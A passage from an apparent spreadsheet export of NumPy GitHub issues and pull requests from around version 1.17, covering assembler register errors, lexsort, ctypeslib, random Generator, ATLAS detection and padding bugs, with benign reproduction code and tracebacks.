/tmp/ccVt9lVz.s:4458: Error: bad register name `%zmm9'_x000D_
/tmp/ccVt9lVz.s:4464: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4472: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4478: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4483: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4489: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4495: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4501: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4507: Error: bad register name `%zmm20'_x000D_
/tmp/ccVt9lVz.s:4514: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4522: Error: no such instruction: `vscalefps %zmm19,%zmm6,%zmm6'_x000D_
/tmp/ccVt9lVz.s:4531: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4539: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:4547: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4555: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4577: Error: no such instruction: `kmovw %eax,%k5'_x000D_
/tmp/ccVt9lVz.s:4586: Error: no such instruction: `kmovw %eax,%k5'_x000D_
/tmp/ccVt9lVz.s:4614: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:4626: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:4631: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4636: Error: bad register name `%zmm7'_x000D_
/tmp/ccVt9lVz.s:4641: Error: bad register name `%zmm8'_x000D_
/tmp/ccVt9lVz.s:4646: Error: bad register name `%zmm9'_x000D_
/tmp/ccVt9lVz.s:4651: Error: bad register name `%zmm10'_x000D_
/tmp/ccVt9lVz.s:4656: Error: bad register name `%zmm11'_x000D_
/tmp/ccVt9lVz.s:4661: Error: bad register name `%zmm12'_x000D_
/tmp/ccVt9lVz.s:4666: Error: bad register name `%zmm13'_x000D_
/tmp/ccVt9lVz.s:4671: Error: bad register name `%zmm14'_x000D_
/tmp/ccVt9lVz.s:4676: Error: bad register name `%zmm15'_x000D_
/tmp/ccVt9lVz.s:4681: Error: bad register name `%zmm16'_x000D_
/tmp/ccVt9lVz.s:4686: Error: bad register name `%zmm17'_x000D_
/tmp/ccVt9lVz.s:4691: Error: bad register name `%zmm18'_x000D_
/tmp/ccVt9lVz.s:4696: Error: bad register name `%zmm19'_x000D_
/tmp/ccVt9lVz.s:4701: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:4706: Error: no such instruction: `vmovdqa64 %zmm5,-112(%rbp)'_x000D_
/tmp/ccVt9lVz.s:4712: Error: no such instruction: `vpxord %zmm6,%zmm6,%zmm6'_x000D_
/tmp/ccVt9lVz.s:4715: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4719: Error: no such instruction: `vmovdqu32 %zmm5,%zmm5'_x000D_
/tmp/ccVt9lVz.s:4725: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4737: Error: bad register name `%zmm21'_x000D_
/tmp/ccVt9lVz.s:4752: Error: no such instruction: `kmovw %eax,%k2'_x000D_
/tmp/ccVt9lVz.s:4766: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:4767: Error: no such instruction: `kmovw %k2,%k7'_x000D_
/tmp/ccVt9lVz.s:4774: Error: bad register name `%zmm10'_x000D_
/tmp/ccVt9lVz.s:4780: Error: no such instruction: `kmovw %k2,%ecx'_x000D_
/tmp/ccVt9lVz.s:4786: Error: bad register name `%zmm15'_x000D_
/tmp/ccVt9lVz.s:4796: Error: bad register name `%zmm5,4)'_x000D_
/tmp/ccVt9lVz.s:4807: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:4813: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:4819: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:4825: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4833: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:4841: Error: no such instruction: `kmovw %k3,%eax'_x000D_
/tmp/ccVt9lVz.s:4855: Error: no such instruction: `kmovw %k1,%eax'_x000D_
/tmp/ccVt9lVz.s:4864: Error: no such instruction: `vgetexpps %zmm0,%zmm1'_x000D_
/tmp/ccVt9lVz.s:4872: Error: no such instruction: `vgetmantps $2,%zmm0,%zmm0'_x000D_
/tmp/ccVt9lVz.s:4879: Error: bad register name `%zmm21'_x000D_
/tmp/ccVt9lVz.s:4886: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:4895: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4903: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4911: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4918: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4924: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4929: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4935: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4940: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4946: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4951: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4957: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4962: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4968: Error: bad register name `%zmm23'_x000D_
/tmp/ccVt9lVz.s:4975: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4981: Error: bad register name `%zmm16'_x000D_
/tmp/ccVt9lVz.s:4989: Error: bad register name `%zmm17'_x000D_
/tmp/ccVt9lVz.s:4997: Error: bad register name `%zmm18'_x000D_
/tmp/ccVt9lVz.s:5005: Error: bad register name `%zmm19'_x000D_
/tmp/ccVt9lVz.s:5013: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:5021: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:5073: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:5082: Error: no such instruction: `kmovw %eax,%k2'_x000D_
/tmp/ccVt9lVz.s:5087: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:5108: Error: invalid character '{' in operand 2_x000D_
/tmp/ccVt9lVz.s:5116: Error: bad register name `%zmm10'_x000D_
/tmp/ccVt9lVz.s:5122: Error: no such instruction: `kmovw %k2,%ecx'_x000D_
/tmp/ccVt9lVz.s:5131: Error: bad register name `%zmm15'_x000D_
/tmp/ccVt9lVz.s:5140: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:5146: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:5152: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:5158: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5166: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:5174: Error: no such instruction: `kmovw %k3,%eax'_x000D_
/tmp/ccVt9lVz.s:5188: Error: no such instruction: `kmovw %k1,%eax'_x000D_
/tmp/ccVt9lVz.s:5197: Error: no such instruction: `vgetexpps %zmm1,%zmm5'_x000D_
/tmp/ccVt9lVz.s:5205: Error: no such instruction: `vgetmantps $2,%zmm1,%zmm1'_x000D_
/tmp/ccVt9lVz.s:5212: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:5219: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:5228: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5236: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:5244: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:5251: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5257: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5262: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5268: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5273: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5279: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5284: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5290: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5295: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5301: Error: bad register name `%zmm22'_x000D_
/tmp/ccVt9lVz.s:5308: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5314: Error: bad register name `%zmm16'_x000D_
/tmp/ccVt9lVz.s:5322: Error: bad register name `%zmm17'_x000D_
/tmp/ccVt9lVz.s:5330: Error: bad register name `%zmm18'_x000D_
/tmp/ccVt9lVz.s:5338: Error: bad register name `%zmm19'_x000D_
/tmp/ccVt9lVz.s:5346: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:5354: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:5376: Error: no such instruction: `kmovw %eax,%k2'_x000D_
/tmp/ccVt9lVz.s:5385: Error: no such instruction: `kmovw %eax,%k2'_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Cray CNL5_x000D_
GCC 6.3.0_x000D_
Python 3.7.4_x000D_
Numpy 1.17.0_x000D_
Intel MKL 2019.3.199_x000D_
</t>
  </si>
  <si>
    <t>Error: bad register name during compilation</t>
  </si>
  <si>
    <t>It turns out we still had a few references around to upload or get NumPy from Sourceforge. Clean them up.</t>
  </si>
  <si>
    <t>DOC: update or remove outdated sourceforge links</t>
  </si>
  <si>
    <t>Numpy 1.17.0 raises MemoryError when using `lexsort` on an empty array with non-standard `strides`. If `strides` is the natural one, or if there is &gt;= 1 element in the input, then it works as expected._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
xs = np.array([], dtype='i8')_x000D_
assert xs.strides == (8,)_x000D_
assert np.lexsort((xs,)).shape[0] == 0 # Works_x000D_
_x000D_
ys = np.array([0], dtype='i8')_x000D_
ys.strides = (16,)_x000D_
assert np.lexsort((ys,)).shape[0] == 1 # Works_x000D_
_x000D_
xs.strides = (16,)_x000D_
assert np.lexsort((xs,)).shape[0] == 0 # MemoryError_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.17.0 3.6.1 (v3.6.1:69c0db5, Mar 21 2017, 18:41:36) [MSC v.1900 64 bit (AMD64)]</t>
  </si>
  <si>
    <t>BUG: np.lexsort MemoryError on empty array with non-standard strides</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">for `v1.11.0`: https://numpy.readthedocs.io/en/latest/_x000D_
_x000D_
@shoyer you're listed as one of the two maintainers (not sure who the other person is), could you delete the deployed docs on RTD?_x000D_
</t>
  </si>
  <si>
    <t>stray outdated copy of docs on ReadTheDocs</t>
  </si>
  <si>
    <t>Addresses #14117 _x000D_
_x000D_
Mentioned `take_along_axis` in the "See Also" section of `choose`. I believe I understood the issue and added the correct documentation, but I appreciate any feedback. Thanks.</t>
  </si>
  <si>
    <t>DOC: mention `take_along_axis` in `choose`</t>
  </si>
  <si>
    <t xml:space="preserve">Followup to #14036 , related to #11521 </t>
  </si>
  <si>
    <t>TST: Add tests for deprecated C functions (PyArray_As1D, PyArray_As1D)</t>
  </si>
  <si>
    <t>['05 - Testing', '56 - Needs Release Note.', 'component: numpy.core']</t>
  </si>
  <si>
    <t>those parameters `nan`, `posinf` and `neginf` were not available in my version 1.16.2</t>
  </si>
  <si>
    <t>DOC: new nan_to_num keywords are from 1.17 onwards</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
After updating Numpy I can no longer use `numpy.ctypeslib.as_ctypes` for an array whose size is larger than 2 ** 31 bytes (a signed C int). This appears to be due to the changes from 08a92de354f1f7592c7957f4aafe892f3d5a828a that allow more general ctypes pointers._x000D_
_x000D_
Old style pointer:_x000D_
https://github.com/numpy/numpy/blob/971e2e89d08deeae0139d3011d15646fdac13c92/numpy/ctypeslib.py#L402-L404_x000D_
_x000D_
New style pointer:_x000D_
https://github.com/numpy/numpy/blob/5a5987291dc95376bb098be8d8e5391e89e77a2c/numpy/ctypeslib.py#L538-L540_x000D_
_x000D_
I'm using ctypeslib in the context of making large `multiprocessing.sharedctypes.Array` objects available to multiprocessing pools. _x000D_
_x000D_
I would wager that this C int size limit runs deep, making a direct fix difficult. I could simply monkey-patch to previous functionality, since I know that my arrays work with the previous, more restrictive wrapping. But I think splitting large (&gt; 2 GB) arrays across pool workers is probably a common use case (I hope I didn't miss an existing issue). _x000D_
_x000D_
I'm a bit out of depth, but would it make sense to fall back to the old behavior after testing for no-strides and native endian-ness?_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
arr = np.zeros((2 ** 31 + 1,), 'b')_x000D_
assert(arr.size * arr.itemsize &gt; 2 ** 31)_x000D_
c_arr = np.ctypeslib.as_ctypes(arr)      _x000D_
```_x000D_
_x000D_
Under versions &gt; 1.16.0 I am getting an error (traceback below), because the dtype memory footprint doesn't fit into a signed C int. _x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```python                                                                                                            _x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-4-e91c3f6f3634&gt; in &lt;module&gt;_x000D_
----&gt; 1 c_arr = np.ctypeslib.as_ctypes(arr)_x000D_
_x000D_
~/.pyenv/versions/3.6.4/envs/ctype_test/lib/python3.6/site-packages/numpy/ctypeslib.py in as_ctypes(obj)_x000D_
    536             raise TypeError("readonly arrays unsupported")_x000D_
    537 _x000D_
--&gt; 538         dtype = _dtype((ai["typestr"], ai["shape"]))_x000D_
    539         result = as_ctypes_type(dtype).from_address(addr)_x000D_
    540         result.__keep = obj_x000D_
_x000D_
ValueError: invalid shape in fixed-type tuple: dtype size in bytes must fit into a C int._x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
I down-versioned numpy until `as_ctypes` worked again:_x000D_
_x000D_
Result of `import sys, numpy; print(numpy.__version__, sys.version)`_x000D_
_x000D_
*Where it works*_x000D_
```_x000D_
1.16.0 3.6.4 (default, Feb 22 2018, 18:37:35) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)]_x000D_
```_x000D_
_x000D_
*Where it breaks*_x000D_
```_x000D_
1.17.0 3.6.4 (default, Feb 22 2018, 18:37:35) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)]_x000D_
```</t>
  </si>
  <si>
    <t>ctypeslib.as_ctypes cannot wrap large arrays (&gt; 2 ** 31 bytes)</t>
  </si>
  <si>
    <t>I encountered a weird scenario, in which it is possible to induce a `numpy.random.Generator` to always produce the same integer value upon calling `integers()`, even though the internal state of `Generator.bit_generator.state` seemingly changes. This only happens if `integers()` is initially called a specific number of times, otherwise the sampled values will behave (pseudo-)randomly as expected. It also only affects the first sampled integer in case `size=(...)` is added to the call._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
from copy import deepcopy_x000D_
import sys, numpy; print(numpy.__version__, sys.version)_x000D_
_x000D_
SEED = 1_x000D_
_x000D_
BITGEN = np.random.SFC64_x000D_
# BITGEN = np.random.PCG64_x000D_
# BITGEN = np.random.Philox_x000D_
N = 1_x000D_
M = 100_x000D_
_x000D_
_x000D_
def main():_x000D_
    rng = np.random.Generator(BITGEN(SEED))_x000D_
_x000D_
    # Issue only happens if N&gt;0 *and* N is odd_x000D_
    for _ in range(N):_x000D_
        rng.integers(0, 2**31-1)_x000D_
_x000D_
    ints, states = [], []_x000D_
_x000D_
    for _ in range(4):_x000D_
        # sampled value of "int_" differs if:_x000D_
        # N==0, N is even, call is random() instead of integers()_x000D_
        int_  = deepcopy(rng).integers(0, 2**31-1)_x000D_
        state = deepcopy(rng.bit_generator.state)_x000D_
_x000D_
        # Advance the RNG's internal state._x000D_
        # This *should* usually make sure that the next iteration's call_x000D_
        # to integers() produces different samples._x000D_
        for _ in range(M):_x000D_
            rng.uniform()_x000D_
_x000D_
        ints.append(int_)_x000D_
        states.append(state)_x000D_
_x000D_
    for name, values in zip(["ints", "states"],_x000D_
                            [ints, states]):_x000D_
        print("")_x000D_
        print(name)_x000D_
        for value in values:_x000D_
            print(value)_x000D_
_x000D_
_x000D_
if __name__ == "__main__":_x000D_
    main()_x000D_
```_x000D_
_x000D_
### Output_x000D_
_x000D_
```bash_x000D_
1.17.0 3.7.3 | packaged by conda-forge | (default, Jul  1 2019, 21:52:21) _x000D_
[GCC 7.3.0]_x000D_
_x000D_
ints_x000D_
2138077778_x000D_
2138077778_x000D_
2138077778_x000D_
2138077778_x000D_
_x000D_
states_x000D_
{'bit_generator': 'SFC64', 'state': {'state': array([10822012043237629067, 14489128587111033830,  3369327766797514304,_x000D_
                         14], dtype=uint64)}, 'has_uint32': 1, 'uinteger': 4276155558}_x000D_
{'bit_generator': 'SFC64', 'state': {'state': array([17974599381666177023, 10461407714979245550,  9510091932853551627,_x000D_
                        114], dtype=uint64)}, 'has_uint32': 1, 'uinteger': 4276155558}_x000D_
{'bit_generator': 'SFC64', 'state': {'state': array([15153555155425159765,  5979911724464602935,  7936913977336769722,_x000D_
                        214], dtype=uint64)}, 'has_uint32': 1, 'uinteger': 4276155558}_x000D_
{'bit_generator': 'SFC64', 'state': {'state': array([14366095984858144903, 18327215719122944750, 10053482158821344921,_x000D_
                        314], dtype=uint64)}, 'has_uint32': 1, 'uinteger': 4276155558}_x000D_
```_x000D_
_x000D_
### What Affects the Issue_x000D_
_x000D_
* Using a different bit generator for `BITGEN` has no effect._x000D_
* Changing `SEED` has no effect (different sampled number that keeps repeating)._x000D_
* Changing `M` has no effect._x000D_
* `N` however is important. It has to be set to a value that is `&gt;0` **and** odd. Otherwise the integers will differ between iterations of the loop._x000D_
* Calling `random()` instead of `integers()` makes the outputs differ between iterations._x000D_
* Adding `dtype="int32"` or `dtype="int64"` to the second call of `integers()` has no effect._x000D_
* Adding `size=(2,)` to the second call of `integers()` will produce for each iteration two values `(a, b)`, where `a` is the same for all iterations and b differs between all iterations. For `size=(3,)` producing tuples `(a, b, c)`, `a` stays the same for all iterations, while both `b` and `c` differ.</t>
  </si>
  <si>
    <t>Generator.integers() always produces the same sample under specific circumstances</t>
  </si>
  <si>
    <t>['00 - Bug', '57 - Close?', 'component: numpy.random']</t>
  </si>
  <si>
    <t>I'm trying to build the latest numpy release on macOS with ATLAS as my BLAS/LAPACK provider but numpy fails to detect the ATLAS version correctly._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
First, I create the following `site.cfg`:_x000D_
```_x000D_
[atlas]_x000D_
libraries = satlas_x000D_
library_dirs = /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/atlas-3.10.3-j53o6sg7cswtaak6duqdofi7emddfg6z/lib_x000D_
rpath = /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/atlas-3.10.3-j53o6sg7cswtaak6duqdofi7emddfg6z/lib_x000D_
include_dirs = /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/atlas-3.10.3-j53o6sg7cswtaak6duqdofi7emddfg6z/include_x000D_
```_x000D_
Then, I build numpy with:_x000D_
```console_x000D_
$ python -s setup.py --no-user-cfg build_x000D_
$ python -s setup.py --no-user-cfg install --prefix=/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy --single-version-externally-managed --root=/_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
blas_opt_info:_x000D_
atlas_3_10_blas_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
customize UnixCCompiler_x000D_
Setting PTATLAS=ATLAS_x000D_
get_default_fcompiler: matching types: '['gnu95', 'nag', 'absoft', 'ibm', 'intel', 'gnu', 'g95', 'pg']'_x000D_
customize Gnu95FCompiler_x000D_
Found executable /Users/Adam/spack/lib/spack/env/clang/gfortran_x000D_
customize Gnu95FCompiler_x000D_
customize Gnu95FCompiler using config_x000D_
compiling '_configtest.c':_x000D_
_x000D_
/* This file is generated from numpy/distutils/system_info.py */_x000D_
void ATL_buildinfo(void);_x000D_
int main(void) {_x000D_
  ATL_buildinfo();_x000D_
  return 0;_x000D_
}_x000D_
_x000D_
C compiler: /Users/Adam/spack/lib/spack/env/clang/clang -Wno-unused-result -Wsign-compare -Wunreachable-code -DNDEBUG -g -fwrapv -O3 -Wall -fPIC_x000D_
_x000D_
compile options: '-c'_x000D_
clang: _configtest.c_x000D_
/Users/Adam/spack/lib/spack/env/clang/clang _configtest.o -L/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/atlas-3.10.3-j53o6sg7cswtaak6duqdofi7emddfg6z/lib -lsatlas -o _configtest_x000D_
dyld: __dyld section not supported in /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/atlas-3.10.3-j53o6sg7cswtaak6duqdofi7emddfg6z/lib/libsatlas.dylib_x000D_
subprocess exited with signal 122_x000D_
success!_x000D_
removing: _configtest.c _configtest.o _configtest.o.d _configtest_x000D_
Status: 255_x000D_
Output: _x000D_
Running from numpy source directory._x000D_
Traceback (most recent call last):_x000D_
  File "setup.py", line 443, in &lt;module&gt;_x000D_
    setup_package()_x000D_
  File "setup.py", line 435, in setup_package_x000D_
    setup(**metadata)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/core.py", line 137, in setup_x000D_
    config = configuration()_x000D_
  File "setup.py", line 158, in configuration_x000D_
    config.add_subpackage('numpy')_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/misc_util.py", line 1035, in add_subpackage_x000D_
    caller_level = 2)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/misc_util.py", line 1004, in get_subpackage_x000D_
    caller_level = caller_level + 1)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/misc_util.py", line 941, in _get_configuration_from_setup_py_x000D_
    config = setup_module.configuration(*args)_x000D_
  File "numpy/setup.py", line 10, in configuration_x000D_
    config.add_subpackage('core')_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/misc_util.py", line 1035, in add_subpackage_x000D_
    caller_level = 2)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/misc_util.py", line 1004, in get_subpackage_x000D_
    caller_level = caller_level + 1)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/misc_util.py", line 941, in _get_configuration_from_setup_py_x000D_
    config = setup_module.configuration(*args)_x000D_
  File "numpy/core/setup.py", line 764, in configuration_x000D_
    blas_info = get_info('blas_opt', 0)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 444, in get_info_x000D_
    return cl().get_info(notfound_action)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 690, in get_info_x000D_
    self.calc_info()_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 1810, in calc_info_x000D_
    if getattr(self, '_calc_info_{}'.format(blas))():_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 1750, in _calc_info_atlas_x000D_
    info = get_info('atlas_3_10_blas_threads')_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 444, in get_info_x000D_
    return cl().get_info(notfound_action)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 690, in get_info_x000D_
    self.calc_info()_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 1347, in calc_info_x000D_
    atlas_version, atlas_extra_info = get_atlas_version(**atlas)_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 1589, in get_atlas_version_x000D_
    'ATLAS_INFO', _c_string_literal(atlas_version))_x000D_
  File "/private/var/folders/21/hwq39zyj4g36x6zjfyl5l8080000gn/T/Adam/spack-stage/spack-stage-y1kdwttz/spack-src/numpy/distutils/system_info.py", line 177, in _c_string_literal_x000D_
    s = s.replace('\\', r'\\')_x000D_
AttributeError: 'NoneType' object has no attribute 'replace'_x000D_
```_x000D_
For whatever reason, my ATLAS version is None, not a string. Hopefully this should be an easy fix._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
macOS 10.14.6_x000D_
Clang 10.0.1_x000D_
ATLAS 3.10.3_x000D_
Python 3.7.4_x000D_
Setuptools 41.0.1_x000D_
Numpy 1.17.0_x000D_
_x000D_
Note that this bug only occurs on macOS or with the Clang compiler.  I was able to successfully build numpy with ATLAS on CentOS 7 with GCC 4.8.5._x000D_
_x000D_
EDIT: I tried setting `ATLAS_VERSION` to 3.10.3 but that didn't work.</t>
  </si>
  <si>
    <t>Bug in ATLAS version detection</t>
  </si>
  <si>
    <t xml:space="preserve">Manual backport (see gh-14191 and gh-14209)._x000D_
_x000D_
In case end_value was greater than the edge values of the array to pad,_x000D_
the resulting difference was negative and caused overflows in case the_x000D_
input array used unsigned types. The new behavior will cast to a_x000D_
compatible signed dtype that is as small as possible (float16 because of_x000D_
the division)._x000D_
Note: Simply casting to float64 doesn't work for complex inputs._x000D_
_x000D_
Protect against this regression with a new test for all numeric dtypes._x000D_
_x000D_
cc @seberg @charris _x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix uint-overflow if padding with linear_ramp and negative gain (backport)</t>
  </si>
  <si>
    <t>In case end_value was greater than the edge values of the array to pad, the resulting difference was negative and caused overflows in case the input array used unsigned types.  Fixed by using 1.17 version of `linspace` instead of `_linear_ramp`._x000D_
_x000D_
Protect against this regression with a new test for all numeric dtypes._x000D_
_x000D_
Fixes #14191._x000D_
_x000D_
cc @seberg, @aleju</t>
  </si>
  <si>
    <t>BUG: Fix uint-overflow if padding with linear_ramp and negative gain</t>
  </si>
  <si>
    <t xml:space="preserve">`numpy` fails to link to any variant of libFLAME (release, master, static, shared) and complains of undefined references of BLAS functions from the libflame library. When I attempted to build `numpy+blis+libflame`, I ended up building `numpy+blis~libflame`_x000D_
_x000D_
### Reproducing code example:_x000D_
Using spack to build numpy as per this [PR](https://github.com/spack/spack/pull/12170)_x000D_
_x000D_
Specific commands executed during build&amp;install are as follows _x000D_
`python3.7' '-s' 'setup.py' '--no-user-cfg' 'build'`_x000D_
_x000D_
`python3.7' '-s' 'setup.py' '--no-user-cfg' 'install' '--prefix=/home/sajid/packages/spack/opt/spack/linux-centos7-x86_64/gcc-9.1.0/py-numpy-1.17.0-psnrtylx4lzvesb6zovmdim7mlt2ubh6' '--single-version-externally-managed' '--root=/`_x000D_
_x000D_
[site.cfg](https://pastebin.com/WT8qewrQ) generated during the build process._x000D_
[build.log](http://pasted.co/7d0db170)_x000D_
[build.env](http://pasted.co/250a78a2)_x000D_
_x000D_
libFLAME was configured to build with lapack2flame and generate a static library ( [build.log](http://pasted.co/d14de1db) for the same)._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; print(numpy.__version__, sys.version)_x000D_
1.17.0 3.7.4 (default, Aug  5 2019, 20:17:04)_x000D_
[GCC 9.1.0]_x000D_
```_x000D_
_x000D_
Link info : _x000D_
```_x000D_
